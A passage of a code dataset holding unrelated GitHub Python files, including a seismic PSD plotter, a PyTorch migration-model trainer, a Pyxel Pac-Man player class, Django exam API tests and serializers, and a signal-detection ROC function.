600 or 10 minutes) for quick lab testing\nfile_struct = '*.[DGCHBE]?[NEZ]' #filename matching template (currently set for ANU LPR200 or TerraSAWR)\n\n########\n\n\ntry: senstype = str(sys.argv[2]).upper()\nexcept: senstype = \"T120_100\"\nif 'TC' in senstype: senstype = senstype.replace('TC','T') #str.replace returns a new string, so the result must be reassigned\n\n#typical instrument/samplerates for ANSIR equipment (more combinations TBA)\nresponse_dict = {\n\t'3DL_100': {'poles':[(-0.03691+0.03702j),(-0.03691-0.03702j),(-343+0j),(-370+467j),(-370-467j),(-836+1522j),(-836-1522j),(-4900+4700j),(-4900-4700j),(-6900+0j),(-15000+0j)],\n\t\t\t'zeros':[0j, 0j, (-392+0j), (-1960+0j), (-1490+1740j), (-1490-1740j)],\n\t\t\t'gain':4.34493e+17,\n\t\t\t'sensitivity': 7.543e+08},\n\t'3DL_250': {'poles':[(-0.03691+0.03702j),(-0.03691-0.03702j),(-343+0j),(-370+467j),(-370-467j),(-836+1522j),(-836-1522j),(-4900+4700j),(-4900-4700j),(-6900+0j),(-15000+0j)],\n\t\t\t'zeros':[0j, 0j, (-392+0j), (-1960+0j), (-1490+1740j), (-1490-1740j)],\n\t\t\t'gain':4.34493e+17,\n\t\t\t'sensitivity': 7.543e+08}, #TODO confirm these are the same but they should be\n\t'T120_100': {'poles':[(-0.03691+0.03702j),(-0.03691-0.03702j), (-343+0j), (-370+467j), (-370-467j), (-836+1522j), (-836-1522j), (-4900+4700j), (-4900-4700j), (-6900+0j), (-15000+0j)],\n\t\t\t\t 'zeros':[0j, 0j, (-392+0j), (-1960+0j), (-1490+1740j), (-1490-1740j)],\n\t\t\t\t 'gain':4.34493e+17, #e.g. A0\n\t\t\t\t 'sensitivity': 7.543e+08}, #e.g. overall sensitivity\n\t'T120_250': {'poles':[(-0.03691+0.03702j),(-0.03691-0.03702j), (-343+0j), (-370+467j), (-370-467j), (-836+1522j), (-836-1522j), (-4900+4700j), (-4900-4700j), (-6900+0j), (-15000+0j)],\n\t\t\t\t 'zeros':[0j, 0j, (-392+0j), (-1960+0j), (-1490+1740j), (-1490-1740j)],\n\t\t\t\t 'gain':4.34493e+17, #e.g. A0\n\t\t\t\t 'sensitivity': 7.543e+08}, #e.g. overall sensitivity\n\t'T20_250': {'poles':[(-0.2214+0.2221j), (-0.2214-0.2221j), (-343+0j), (-370+467j), (-370-467j), (-836+1522j), (-836-1522j), (-4900+4700j), (-4900-4700j), (-6900+0j), (-15000+0j)],\n\t\t\t\t 'zeros':[0j, 0j, (-392+0j), (-1960+0j), (-1490+1740j), (-1490-1740j)],\n\t\t\t\t 'gain':4.34493e+17,\n\t\t\t\t 'sensitivity': 6.31726e+08}\n}\n\nif senstype not in response_dict.keys():\n\tprint(\"instrument type/samplerate %s was not found! 
select from: %s\" % (senstype,list(response_dict.keys())))\n\texit()\n\n\n\nfrom pathlib import Path,PureWindowsPath\nimport glob, os\nimport multiprocessing as mp\nfrom obspy import read\nfrom obspy import UTCDateTime\nfrom obspy.signal import PPSD #seems fine enough with the default\nfrom obspy.imaging.cm import pqlx,viridis_white_r\n\noutdir = None\nif figdir and figdir != '': outdir = Path(figdir)\n\nfyledir = Path(str(sys.argv[1]))\n\nimport platform\nif platform.system() == \"Windows\":\n\toutdir = PureWindowsPath(outdir)\n\tfyledir = PureWindowsPath(fyledir)\n\n\t#mp.set_start_method('fork') #i think this is required for windows..\n#elif platform.system() in ['Darwin']:\n#\tmp.set_start_method('spawn') # do not set this for OSX and the below mp code\n\nif not os.path.isdir(outdir): os.mkdir(outdir)\nif not os.path.isdir(fyledir):\n\tprint(\"directory %s not found\" % fyledir); exit()\n\nall_fyles = glob.glob(os.path.join(fyledir,'**/*'+file_struct),recursive=True)\nif len(all_fyles) == 0: all_fyles = glob.glob(os.path.join(fyledir,file_struct),recursive=True)\nif len(all_fyles) == 0: print(\"no files found in directory %s\" % fyledir); exit()\n\n\n#mp function\ndef plot_channel(cha_code):\n\n\tfyles = [ele for ele in all_fyles if ele[-1].upper() == cha_code]\n\tif len(fyles) == 0: print(\"***** NO FILES FOUND for %s ????\" % cha_code); return\n\n\tfyles.sort() #put in time order descending\n\tfyles = fyles[-int(num_days_lookback):] #only select the last 5 days or so\n\n\tst = read(fyles[0])\n\n\tppsd = PPSD(stats=st[0].stats,metadata=response_dict[senstype],ppsd_length=psd_len) #30 minutes TODO make dynamic\n\tfor fyle in fyles: #now add the rest\n\t\tst = read(fyle)\n\t\tppsd.add(st)\n\n\tif len(ppsd.psd_values) == 0: print(\"no valid PSD data %s\" % cha_code); return\n\n\tppsd.plot(cmap=viridis_white_r)\n\tif outdir:\n\t\tfigname = Path(\"%s/%s.%s.png\" % (outdir,st[0].stats.station,cha_code))\n\t\tif platform.system() == \"Windows\": figname = PureWindowsPath(figname)\t\t\n\t\tppsd.plot(filename=figname,cmap=viridis_white_r) #will only write if asked to\n\t\tprint(\"%s %s done and %s written!\" % (st[0].stats.station,cha_code,figname))\t\t\n\telse:\n\t\tprint(\"%s %s done!\" % (st[0].stats.station,cha_code))\n\treturn\n\n\nif __name__ == '__main__':\n\n\t\"\"\"\n\twith mp.Pool(processes=3) as pool:\n\t\tpool.imap(plot_channel,['Z','N','E'])\n\t\tpool.close()\n\t\tpool.join()\n\t\"\"\"\n\n\t#awkward but the below works for OSX & linux\n\tworkers = []\n\tfor ch in ['N','E','Z']:\n\t\tp = mp.Process(target=plot_channel,args=[ch])\n\t\tworkers.append(p)\n\t\tp.start()\n\tfor p in workers:\n\t\tp.join()\n\n\n","repo_name":"filefolder/field_psdscan","sub_path":"field_psdscan.py","file_name":"field_psdscan.py","file_ext":"py","file_size_in_byte":5398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71122338026","text":"import torchvision.models as models\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\nfrom copy import deepcopy\nimport pandas as pd\nimport numpy as np\nimport importlib\nimport argparse\nimport sklearn\nimport random\nimport torch\nimport math\nimport json\n\nimport socialSigNoDrop\nimportlib.reload(socialSigNoDrop)\nfrom helpers import *\n\n\n\n\nweights = {'0': 1/51, '1': 1/832, '2': 1/1362, '3': 1/86}\n\ndef classify_migration(x):\n if x == 0:\n return weights['0']\n elif (x > 0) & (x < 1000):\n return weights['1']\n elif (x >= 100) & (x < 10000):\n return weights['2']\n else:\n return 
weights['3']\n\n\ndf = pd.read_csv(\"./data/mexico2010.csv\")\ndf = df.drop(['Unnamed: 0', 'GEO2_MX'], axis = 1)\ndf = df.fillna(0)\ndf = df.apply(lambda x: pd.to_numeric(x, errors='coerce'))\nwith open(\"./us_vars.txt\", \"r\") as f:\n vars = f.read().splitlines()\nvars = [i for i in vars if i in df.columns]\ndf = df[vars]\n\n\ndf['weight'] = df['sum_num_intmig'].apply(lambda x: classify_migration(x))\nw = df['weight'].values\ndf = df.drop(['weight'], axis = 1)\n\n\ny = df['sum_num_intmig'].values\nX = df.loc[:, df.columns != \"sum_num_intmig\"].values\n\nmMScale = preprocessing.MinMaxScaler()\nX = mMScale.fit_transform(X)\n\n\n\n\nlr = 1e-4\n# lr = 1e-6\n# lr = 1e-8\nbatchSize = 16\nepochs = 100\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n# model = socialSigNoDrop.SocialSigNet(X=X, outDim = batchSize).to(device)\nresnet50 = models.resnet50(pretrained=True)\nmodel = socialSigNoDrop.scoialSigNet_NoDrop(X=X, outDim = batchSize, resnet = resnet50).to(device)\ncriterion = torch.nn.MSELoss(reduction = 'mean')\noptimizer = torch.optim.Adam(model.parameters(), lr = lr)\n# checkpoint = torch.load(\"./trained_models/socialSig_MEX_10epochs_AdamLoss.torch\")\n# model.load_state_dict(checkpoint['model_state_dict'])\n\n\n\n\nx_train, y_train, x_val, y_val, w_train, w_val = train_test_split_weighted(X, y, w, .80)\n\nprint(\"x_train: \", len(x_train))\nprint(\"y_train: \", len(y_train))\nprint(\"x_val : \", len(x_val))\nprint(\"y_val : \", len(y_val))\n\n\nprint(w_train)\n\n\n\ntrain = [(k,v,w) for k,v,w in zip(x_train, y_train, w_train)]\nval = [(k,v,w) for k,v,w in zip(x_val, y_val, w_val)]\n\n\nprint(len(train))\nprint(len(val))\n\n\n\n\n\n# Prep the training and validation set\ntrain = torch.utils.data.DataLoader(train, batch_size = batchSize, shuffle = True)\nval = torch.utils.data.DataLoader(val, batch_size = batchSize, shuffle = True)\n\n\nprint('done')\n\n\n\nbest_model_wts_mae, best_model_wts_loss, val_losses_plot = train_weighted_model(model, train, val, criterion, optimizer, epochs, batchSize, device, lr)\n\n\n\n# daadg\n\n\nmodel.load_state_dict(best_model_wts_mae)\ntorch.save({\n 'epoch': 50,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': criterion,\n }, \"./new_trained_models/best_model_wts_mae_200epochs.torch\")\n\n\nmodel.load_state_dict(best_model_wts_loss)\ntorch.save({\n 'epoch': 50,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': criterion,\n }, \"./new_trained_models/best_model_wts_loss_200epochs.torch\")\n\n\n\n\n\nprint(val_losses_plot)\n\nplt.plot([i for i in range(0, epochs)], val_losses_plot)\nplt.savefig((\"./new_loss_plots/best_model_wts_200epoch.png\"))","repo_name":"heatherbaier/socialSig-mig","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29441278950","text":"import csv\nfp=open('sample.csv',\"w+\")\nf=csv.writer(fp)\nf.writerow([\"Name\",\"Place\",\"Age\"])\nf.writerows([(\"k\",\"toronto\",22),(\"B\",\"VanCouver\",45),(\"c\",\"yemen\",34)])\nfp.close()\nfg=open(\"sample.csv\",\"r\")\ng=csv.reader(fg)\nfor i in g:\n\tprint(i)","repo_name":"afreedfayaz18/Assignment_6","sub_path":"as4.py","file_name":"as4.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42335514093","text":"import 
pyxel\nimport pygame\nimport game_map\n\n#character state\nSTOPPED = 0\nWALKING = 1\n\n#character orientation\nRIGHT = 0\nLEFT = 1\nDOWN = 2\nUP = 3\nAWAY = 4\n\nclass Player:\n def __init__(self, game_control, tile, top_offset, game_map):\n self.sound_chomp = pygame.mixer.Sound('pacman_chomp.wav')\n self.game_control = game_control\n self.intended_direction = AWAY\n self.current_direction = self.intended_direction\n self.state = STOPPED\n self.top_offset = top_offset\n self.tile = tile\n self.speed = 1\n self.game_map = game_map\n self.steps_per_tile = int(self.game_map.tile_size // self.speed)\n self.steps = {\n RIGHT: [(self.speed,0)]*self.steps_per_tile,\n LEFT: [(-self.speed,0)]*self.steps_per_tile,\n UP: [(0,-self.speed)]*self.steps_per_tile,\n DOWN: [(0,self.speed)]*self.steps_per_tile\n }\n self.absolute_position = (self.tile[1]*8, self.tile[0]*8 + self.top_offset)\n self.current_animation_frame = 0\n self.move_buffer = []\n self.animation_frames = [\n [(0,32),(8,32),(0,40),(8,40)], #right\n [(0,32),(32,32),(24,40),(32,40)], #left\n [(0,32),(40,32),(48,32),(40,40)], #down\n [(0,32),(16,32),(24,32),(16,40)], #up\n [(0,32),(0,32),(0,32),(0,32)] #away\n ]\n\n def get_current_tile(self):\n tile = (int((self.absolute_position[1] - self.top_offset) // 8), int(self.absolute_position[0] // 8))\n return tile\n\n def opposites(self, dir1, dir2):\n return (dir1 == UP and dir2 == DOWN) or (dir1 == DOWN and dir2 == UP) or (dir1 == LEFT and dir2 == RIGHT) or (dir1 == RIGHT and dir2 == LEFT)\n\n def handle_movement(self):\n move = None\n if self.opposites(self.intended_direction, self.current_direction):\n count = len(self.move_buffer)\n self.move_buffer.clear() #clear the move buffer\n self.move_buffer.extend(self.steps[self.intended_direction][:self.steps_per_tile - count]) #make the character return to the tile base position\n self.current_direction = self.intended_direction\n\n if len(self.move_buffer) == 0: #will try to move to the next tile\n #calculate tile the character is at, based on absolute position\n tile = self.get_current_tile()\n if self.game_map.is_transport_tile(tile):\n dest_tile = self.game_map.get_transport_destination(tile)\n self.absolute_position = (dest_tile[1]*8, dest_tile[0]*8 + self.top_offset)\n self.move_buffer.extend(self.steps[self.current_direction])\n else:\n intended_tile = None\n steps = None\n line, column = tile\n #calculate the tile the character wants to go to\n if self.intended_direction == UP:\n intended_tile = (line - 1, column)\n elif self.intended_direction == DOWN:\n intended_tile = (line + 1, column)\n elif self.intended_direction == LEFT:\n intended_tile = (line, column - 1)\n elif self.intended_direction == RIGHT:\n intended_tile = (line, column + 1)\n\n if self.game_map.is_player_allowed(intended_tile): #if player is allowed to move based on the intended direction\n self.current_direction = self.intended_direction\n self.move_buffer.extend(self.steps[self.current_direction])\n move = self.move_buffer.pop(0)\n else: #else, try to move based on the old direction\n if self.current_direction == UP:\n intended_tile = (line - 1, column)\n elif self.current_direction == DOWN:\n intended_tile = (line + 1, column)\n elif self.current_direction == LEFT:\n intended_tile = (line, column - 1)\n elif self.current_direction == RIGHT:\n intended_tile = (line, column + 1)\n\n if self.game_map.is_player_allowed(intended_tile): #if allowed to move using the old direction\n self.move_buffer.extend(self.steps[self.current_direction])\n move = self.move_buffer.pop(0)\n 
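# take the next buffered step for this frame\n 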
else:\n move = self.move_buffer.pop(0)\n\n if move:\n self.absolute_position = (self.absolute_position[0] + move[0], self.absolute_position[1] + move[1])\n #self.sound_chomp.play(loops=-1)\n #else:\n #self.sound_chomp.stop()\n\n def handle_food(self):\n tile = self.get_current_tile()\n base_tile_position = (tile[1]*self.game_map.tile_size, tile[0]*self.game_map.tile_size + self.top_offset)\n if self.absolute_position == base_tile_position:\n self.game_map.eat_food(*tile)\n\n def update(self):\n if pyxel.btn(pyxel.KEY_LEFT):\n self.intended_direction = LEFT\n self.state = WALKING\n elif pyxel.btn(pyxel.KEY_RIGHT):\n self.intended_direction = RIGHT\n self.state = WALKING\n elif pyxel.btn(pyxel.KEY_DOWN):\n self.intended_direction = DOWN\n self.state = WALKING\n elif pyxel.btn(pyxel.KEY_UP):\n self.intended_direction = UP\n self.state = WALKING\n \n self.intended_direction = self.intended_direction\n\n self.handle_movement()\n self.handle_food()\n\n def draw(self, shake_x, shake_y):\n if self.state == WALKING:\n self.current_animation_frame = (self.current_animation_frame + 1) % 4\n\n pyxel.blt(self.absolute_position[0] + shake_x, self.absolute_position[1] + shake_y, 0, \n self.animation_frames[self.current_direction][self.current_animation_frame][0], \n self.animation_frames[self.current_direction][self.current_animation_frame][1], \n 8, 8, 0)","repo_name":"emanoelbarreiros/programacao1","sub_path":"codigo/pyxel/pacman/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":6020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38036547014","text":"'''\nWrite a script that sorts a list of tuples based on the number value in the tuple.\nFor example:\n\nunsorted_list = [('first_element', 4), ('second_element', 2), ('third_element', 6)]\nsorted_list = [('second_element', 2), ('first_element', 4), ('third_element', 6)]\n\n'''\n\nunsorted_list = [('first_element', 4), ('second_element', 2), ('third_element', 6)]\nsorted_list = []\n\nsorted_list = sorted(unsorted_list, key=lambda x: x[1])\nprint(sorted_list)\n\n# don't think I would have come up with this solution because I don't know what lambda is\n","repo_name":"patfennemore/different-solutions","sub_path":"solution_05.py","file_name":"solution_05.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43908335513","text":"from rich import pretty\n\nfrom lib.excel import Excel\n\nif __name__ == '__main__':\n # Install pretty console\n pretty.install()\n # Do basic validation\n app = Excel()\n app.start_comparison()\n input(\"Press Enter key to close\")\n\n","repo_name":"7ard1grad3/InventoryComperison","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33608360543","text":"from django.urls import reverse\nfrom rest_framework import status\nfrom apps.tests.base import BaseAPITestCaseSetup\nfrom apps.exams.models import (\n Exam, Question, QuestionAnswer\n)\nfrom apps.branches.models import Branch\nfrom apps.courses.models import Course\n\n\nclass ExamAPITest(BaseAPITestCaseSetup):\n def setUp(self):\n super().setUp()\n self.branch = Branch.objects.create(\n name='Karakol Liceyum',\n oblast='IK',\n city='Karakol',\n address='Alamedin 1',\n email='branch@gmail.com',\n telephone_number='+996200422541',\n description='akskajfdksa'\n )\n 
self.course = Course.objects.create(\n title=\"Python\",\n description=\"dfsdfsdf\",\n status=\"C\",\n period=\"9 месяцев\",\n price=9000,\n program_link=\"https://it-academy.kg/courses/python\",\n branch=self.branch\n )\n self.exam = Exam.objects.create(\n title=\"Python\",\n exam_type='E',\n course=self.course\n )\n self.question = Question.objects.create(\n title='Test question',\n question_type='R',\n exam=self.exam\n )\n self.question_answer = QuestionAnswer.objects.create(\n question=self.question,\n title='Correct answer',\n is_correct=True\n )\n\n def test_get_exam_list_success(self):\n url = reverse('exams-list')\n response = self.client.get(path=url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.json().get('results')), 1)\n\n def test_get_exam_detail_success(self):\n url = reverse('exams-detail', kwargs={'pk': self.exam.pk})\n response = self.client.get(path=url, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.json()['title'], self.exam.title)\n\n def test_exam_create_success(self):\n data = {\n \"title\": \"Python\",\n \"exam_type\": \"E\",\n \"questions\": [],\n \"course\": {\n \"id\": 1\n }\n }\n url = reverse('exams-list')\n response = self.client.post(path=url, data=data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(response.json()['title'], data['title'])\n\n def test_exam_update_success(self):\n data = {\n \"title\": \"IT academy\",\n \"exam_type\": \"E\",\n \"questions\": [],\n \"course\": {\n \"id\": 1\n }\n }\n url = reverse('exams-detail', kwargs={'pk': self.exam.pk})\n response = self.client.put(path=url, data=data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.json().get('title'), data['title'])\n\n def test_exam_partial_update_success(self):\n data = {\n \"title\": \"Javascript\",\n \"course\": {\n \"id\": 1\n }\n }\n url = reverse('exams-detail', kwargs={'pk': self.exam.pk})\n response = self.client.patch(path=url, data=data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.json().get('title'), data['title'])\n\n def test_exam_delete_success(self):\n url = reverse('exams-detail', kwargs={'pk': self.exam.pk})\n response = self.client.delete(path=url, format='json')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(Exam.objects.filter(pk=self.exam.pk).exists(), False)\n","repo_name":"edzen12/min_crm","sub_path":"backend/crm/apps/tests/exams/test_exams.py","file_name":"test_exams.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38678711889","text":"# help command to DM command lists to requesting user.\n\nfrom systems.logger import log\n\nclass Help:\n def __init__(self):\n self.help_str = \"\"\n\n async def command(self, message):\n self.help_str = \"\"\n with open(\"./data/etc/help.txt\", 'r', encoding='utf-8') as f:\n for line in f.readlines():\n self.help_str += line\n log(f'[Help] - {message.author} requested help')\n\n await message.author.send(f'```yaml\\n\\n{self.help_str}```')\n\n","repo_name":"matte54/ProjectReggie","sub_path":"systems/commands/cmd_help.py","file_name":"cmd_help.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} 
+{"seq_id":"1898191409","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.signal import find_peaks\nfrom scipy.io import savemat\nfrom sklearn.externals import joblib\n\ndef genROC5b(MMList, NNList, A, minpeakwidth, mpd, SL, AS, trainedNet, D, mode1, mode2, timeBeAf):\n AS = AS - np.convolve(AS, np.ones(10000) / 10000, mode='valid') # Smooth the noise\n print('mini of amp:', A)\n mininewForBench, _, _ = MakeMiniMatFS(D, SL, A, mode1) # Pearsondist mean=1\n mininewForBench = -mininewForBench\n\n if mode2 == 1: # equal spacing\n MNtrace = mininewForBench.reshape((1, -1))\n MNpZtrace = MakeMNpZ(MNtrace, SL) # alternating minis and zeros\n trueLoc = np.arange(71, 71 + 600 * (D // 2), 600)\n else: # random spacing\n spacing = np.round(np.random.normal(500, 200, D - 1)).astype(int)\n MNpZtrace = np.zeros(SL)\n MNpZtrace[:SL] = mininewForBench[0, :]\n trueLoc = [71]\n for i in range(1, D):\n MNpZtrace = MNpZtrace[:trueLoc[i - 1] + SL - 71]\n MNpZtrace = np.concatenate([MNpZtrace, np.zeros(SL - 71 + spacing[i - 1])])\n MNpZtrace[trueLoc[i - 1] + spacing[i - 1] - 70:trueLoc[i - 1] + spacing[i - 1] + SL - 71] += mininewForBench[i, :]\n trueLoc.append(trueLoc[i - 1] + spacing[i - 1])\n MNpZtrace = -MNpZtrace\n\n ASmod = AS.reshape((1, -1))\n minL = min(len(MNpZtrace), len(AS))\n ASmod2 = ASmod[:, :minL]\n MNpZtrace2 = MNpZtrace[:minL]\n TN = trainedNet # rename the trained network\n\n tmp = MNpZtrace2 + ASmod2\n tmp1 = tmp.copy()\n\n TPR = np.zeros((len(MMList), len(NNList)))\n FDR = np.zeros((len(MMList), len(NNList)))\n FNR = np.zeros((len(MMList), len(NNList)))\n TPLoc = []\n FPLoc = []\n FNLoc = []\n MNpZtrace2_all = []\n ASmod2_all = []\n trueLoc_all = []\n FF = np.empty((len(MMList), len(NNList)), dtype=object)\n\n for MM_idx, MM in enumerate(MMList):\n TPLoc_MM = []\n FPLoc_MM = []\n FNLoc_MM = []\n for NN_idx, NN in enumerate(NNList):\n print(A, MM, NN)\n pks = [1]\n Pk_list = []\n POS = 0\n F = []\n\n iteration = 0\n tmp = tmp1.copy()\n while pks:\n iteration += 1\n # GENERATE CV\n CVtmpa = TN(MakeCircMatData(SL, tmp))\n CVtmp = CVtmpa[0, :]\n CVtmp[CVtmp < 0] = 0\n CVtmp = np.convolve(CVtmp, np.ones(MM) / MM, mode='valid')\n\n # FIND CV PEAKS\n pks, _ = find_peaks(CVtmp, distance=mpd, prominence=NN, width=minpeakwidth)\n Pk_list = np.concatenate([Pk_list, pks]) # add pk to list\n\n # SUBTRACT DETECTED MINI FROM TRACE\n if pks.size > 0:\n for n in range(pks.size):\n inval = slice(pks[n] - 50 + 70, pks[n] + 70 + 100)\n tmp[inval] = 0 # zero peak\n tmp[inval.start + 100] = ASmod2[0, :len(inval)] # set trace after mini peak to noise values\n\n # PLOT CV ORIGINAL AND REMADE TRACE\n f, ax = plt.subplots()\n f.set_size_inches(22, 5)\n ax.plot(tmp1[70:])\n ax.hold(True)\n ax.plot(tmp[70:])\n ax.plot(10 * CVtmp)\n ax.scatter(Pk_list, tmp1[Pk_list + 71], c='r', marker='o', label='Peaks')\n lastTL = len([loc for loc in trueLoc if loc < len(tmp1)]) # last true location\n ax.scatter(trueLoc[:lastTL] - 70, tmp1[trueLoc[:lastTL] - 70], c='k', marker='o', label='True Peaks')\n F.append(f)\n plt.close(f)\n\n Pk_list1 = np.sort(Pk_list + 71) # offset detected locations to compare to true locations\n\n AA = np.isclose(Pk_list1, trueLoc, rtol=timeBeAf, atol=1) # are detected minis within 40 locations of true locations?\n lastTL = len([loc for loc in trueLoc if loc < len(tmp1)]) # last true location in trace\n BB = np.isclose(trueLoc[:lastTL], Pk_list1, rtol=timeBeAf, atol=1) # true locations not detected\n\n TP = np.sum(AA == 1)\n TPr = TP / lastTL # true pos rate = TP/total minis\n FP = 
np.sum(AA == 0)\n FDr = FP / len(Pk_list1) # false detection rate= % detected minis not TP\n FN = np.sum(BB == 0)\n FNr = FN / lastTL # false neg rate = FN/(total minis)\n\n TPLoc_MM.append(Pk_list1[AA])\n FPLoc_MM.append(Pk_list1[~AA])\n FNLoc_MM.append(trueLoc[~BB])\n\n TPR[MM_idx, NN_idx] = TPr\n FDR[MM_idx, NN_idx] = FDr\n FNR[MM_idx, NN_idx] = FNr\n\n FF[MM_idx, NN_idx] = F\n\n TPLoc.append(TPLoc_MM)\n FPLoc.append(FPLoc_MM)\n FNLoc.append(FNLoc_MM)\n\n MNpZtrace2_all.append(MNpZtrace2)\n ASmod2_all.append(ASmod2)\n trueLoc_all.append(trueLoc)\n\n return TPR, FDR, FNR, TPLoc, FPLoc, FNLoc, MNpZtrace2_all, ASmod2_all, trueLoc_all, FF\n","repo_name":"mrreganwang/Mini_Scripts","sub_path":"python/helper_functions/genROC5b.py","file_name":"genROC5b.py","file_ext":"py","file_size_in_byte":5021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17187909144","text":"from rest_framework import serializers\nfrom .models import PostComment\n\nfrom streams.settings import DEFAULT_PROFILE_IMAGE\n\n\nclass PostCommentSerializer(serializers.ModelSerializer):\n handle = serializers.CharField(source='owner.handle', read_only=True)\n profile_image = serializers.SerializerMethodField(read_only=True)\n # created_at = serializers.SerializerMethodField(method_name='get_created_at', read_only=True)\n # updated_at = serializers.SerializerMethodField(method_name='get_updated_at', read_only=True)\n\n class Meta:\n model = PostComment\n fields = ['id', 'post', 'owner', 'handle', 'profile_image', 'text', 'is_deleted', 'created_at', 'updated_at']\n read_only_fields = ('id', 'post', 'owner')\n\n def create(self, validated_data):\n id = self.context.get('id')\n post = self.context.get('post')\n owner = self.context.get('owner')\n return PostComment.objects.create(id=id, post=post, owner=owner, **validated_data)\n\n @staticmethod\n def get_profile_image(instance):\n if instance.owner.image:\n return instance.owner.image\n return DEFAULT_PROFILE_IMAGE\n\n @staticmethod\n def get_created_at(instance):\n return instance.created_at.isoformat()\n\n @staticmethod\n def get_updated_at(instance):\n return instance.updated_at.isoformat()\n\n# class CommentSerializer(serializers.ModelSerializer):\n# created_at = serializers.SerializerMethodField(method_name='get_created_at', read_only=True)\n# updated_at = serializers.SerializerMethodField(method_name='get_updated_at', read_only=True)\n#\n# class Meta:\n# model = Comment\n# fields = ['id', 'post', 'parent', 'account', 'caption', 'is_deleted', 'created_at', 'updated_at']\n# read_only_fields = ['account', 'is_deleted']\n#\n# def create(self, validated_data):\n# account = self.context.get('account')\n# # post = self.context.get('post')\n# return Comment.objects.create(account=account, **validated_data)\n#\n# def get_created_at(self, instance):\n# return instance.created_at.isoformat()\n#\n# def get_updated_at(self, instance):\n# return instance.updated_at.isoformat()\n","repo_name":"johnvaught/streams-backend","sub_path":"streams/apps/comments/serlializers.py","file_name":"serlializers.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4470928768","text":"\nfrom employee.models import Station, Plantilla, Employee, EmployeeEducationalBackground, EmployeeEligibility\nfrom django.db.models import Q\nfrom django.shortcuts import get_object_or_404\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import 
action\nfrom rest_framework.response import Response\n\nfrom .pagination import EmployeeListPagination\nfrom .serializers import (\n StationSerializer,\n PlantillaSerializer,\n EmployeeListSerializer,\n EmployeeCreateFormSerializer,\n EmployeeUpdatePersonalDetailsFormSerializer,\n EmployeeUpdateAppointmentDetailsFormSerializer,\n EmployeeDetailsSerializer,\n EmployeeBulkDeleteSerializer,\n EmployeeEducationalBackgroundSerializer,\n EmployeeEligibilitySerializer\n)\n\n\n\nclass StationViewSet(viewsets.ModelViewSet):\n queryset = Station.objects.all()\n serializer_class = StationSerializer\n\n @action(methods=['get'], detail=False)\n def get_all(self, request):\n station_queryset = Station.objects.all()\n serializer = self.get_serializer(station_queryset, many=True)\n return Response(serializer.data, 200)\n\n\n\nclass PlantillaViewSet(viewsets.ModelViewSet):\n queryset = Plantilla.objects.all()\n serializer_class = PlantillaSerializer\n\n @action(methods=['get'], detail=False)\n def get_all_open_by_station(self, request):\n station = request.GET.get('s') \n filter_conditions = Q()\n plantilla_queryset = []\n if station != \"\":\n filter_conditions.add(Q(station=station), Q.AND)\n filter_conditions.add(Q(is_open=1), Q.AND)\n plantilla_queryset = Plantilla.objects.all().filter(filter_conditions)\n serializer = self.get_serializer(plantilla_queryset, many=True)\n return Response(serializer.data, 200)\n\n\n\nclass EmployeeViewSet(viewsets.ModelViewSet):\n queryset = Employee.objects.all()\n serializer_class = EmployeeListSerializer\n pagination_class = EmployeeListPagination\n\n def list(self, request):\n search = request.GET.get('q', None)\n is_active = request.GET.get('ia', None) \n station = request.GET.get('st', None) \n sex = request.GET.get('se', None)\n civil_status = request.GET.get('cs', None)\n application_status = request.GET.get('as', None) \n level = request.GET.get('l', None) \n firstday_gov_from = request.GET.get('fd_g_f', None) \n firstday_gov_to = request.GET.get('fd_g_t', None) \n firstday_sra_from = request.GET.get('fd_s_f', None) \n firstday_sra_to = request.GET.get('fd_s_t', None) \n first_appointment_from = request.GET.get('f_appt_f', None) \n first_appointment_to = request.GET.get('f_appt_t', None) \n last_appointment_from = request.GET.get('l_appt_f', None) \n last_appointment_to = request.GET.get('l_appt_t', None) \n last_step_increment_from = request.GET.get('l_si_f', None) \n last_step_increment_to = request.GET.get('l_si_t', None) \n last_adjustment_from = request.GET.get('l_adj_f', None) \n last_adjustment_to = request.GET.get('l_adj_t', None) \n last_promotion_from = request.GET.get('l_prom_f', None) \n last_promotion_to = request.GET.get('l_prom_t', None)\n filter_conditions = Q()\n\n if search:\n filter_conditions.add(\n Q(fullname__icontains=search) \n | Q(employee_id__icontains=search) \n 